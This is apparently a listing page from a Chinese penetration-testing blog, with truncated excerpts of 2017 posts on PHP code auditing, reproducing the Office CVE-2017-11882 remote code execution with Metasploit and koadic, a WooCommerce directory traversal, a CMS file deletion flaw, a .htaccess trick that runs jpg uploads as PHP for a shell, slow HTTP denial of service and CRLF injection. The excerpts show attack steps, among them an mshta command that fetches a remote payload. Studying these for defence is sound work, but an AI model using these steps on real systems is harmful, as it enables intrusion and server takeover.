06 php代码审计之弱类型引发的灾难

admin     2017.12.06     代码审计     抢沙发     18人打酱油
有人说php是世界上最好的语言,这可能是对开发人员来说,确实有这方面的特点,因为它开发起来不像其他语言那样麻烦,就比如:弱类型,它不需要像java等语言那样明确定义数据类型。这给开发带来了很大的便利,所有的数据类型都可以用$xx来定义,而不需要inti,stringa,floadb等等这样去定...

02 office远程代码执行复现

xiaoyu     2017.12.02     未分类     抢沙发     33人打酱油
1.首先下载CVE-2017-11882的攻击脚本 2.然后把攻击脚本移动到msf相关目录中 把PS_shell.rb移动到/usr/share/metasploit-framework/modules/exploits/windows/local/ mvPS_...

01 CVE-2017-17058:WordPress插件WooCommerce 2.0/3.0 – 目录遍历

heiye     2017.12.01     渗透测试     抢沙发     74人打酱油
漏洞验证代码 $woo="www/wp-content/plugins/woocommerce/templates/emails/plain/";` functionfile_get_contents_utf8($fn){ $opts=array( 'http'=&...

30 PHP代码审计入门之路---第一篇

admin     2017.11.30     代码审计     抢沙发     42人打酱油
0x01前言 虽然市面上的代码审计的文章已经一大把了,但是还是决定重复造轮子,打算作为一个系列来写的,近年越来越多的安全研究人员投入到php应用的漏洞挖掘,相对应的代码安全问题也被大量的暴露出来,身处这个时代,我很高兴身边的白帽子前辈不断寻求突破并丰富和完善了代码审计这个概念,学到今日,笔...

29 Catfish(鲶鱼) CMS任意图片删除

admin     2017.11.29     代码审计     抢沙发     51人打酱油
文件路径:\application\user\controller\Index.php 问题代码:91行-----------137行 分析: 第一步:我们来到111行判断上传头像是否是图片,我们来跟踪isLegalPicture方法: 在\application\user\...

29 .htaccess拿shell

admin     2017.11.29     渗透测试     抢沙发     36人打酱油
新建个.htaccess文件内容: ForceTypeapplication/x-httpd-php SetHandlerapplication/x-httpd-php 在他当前目录下只要是以jpg结尾的都会以PHP程序去解析 ...

29 CVE-2017-11882复现过程

heiye     2017.11.29     metasploit     抢沙发     58人打酱油
1.从github克隆CVE-2017-11882的攻击脚本 gitclonehttps://github.com/starnightcyber/CVE-2017-11882.git 2.把PS_shell.rb移动到/usr/share/metasploit-fram...

22 CVE-2017-11882复现配合koadic

admin     2017.11.22     渗透测试     抢沙发     222人打酱油
项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshtahttp://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[[email protected]]...
0x01前言 主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。 0x02什么是Http拒绝服务攻击? 缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量httprequest攻击,直到服务器带宽被打...

20 CRLF注射教程

admin     2017.11.20     渗透测试     抢沙发     53人打酱油
CRLF注射剂定义 CRLF指特殊字符元素“回车”和“换行”。这些元素嵌入在HTTP头文件和其他软件代码中,以表示行尾(EOL)标记。许多互联网协议,包括MIME(电子邮件),NNTP(新闻组),更重要的是HTTP,使用CRLF序列将文本流分离成离散的元素。Web应用程序开发人员根...

关闭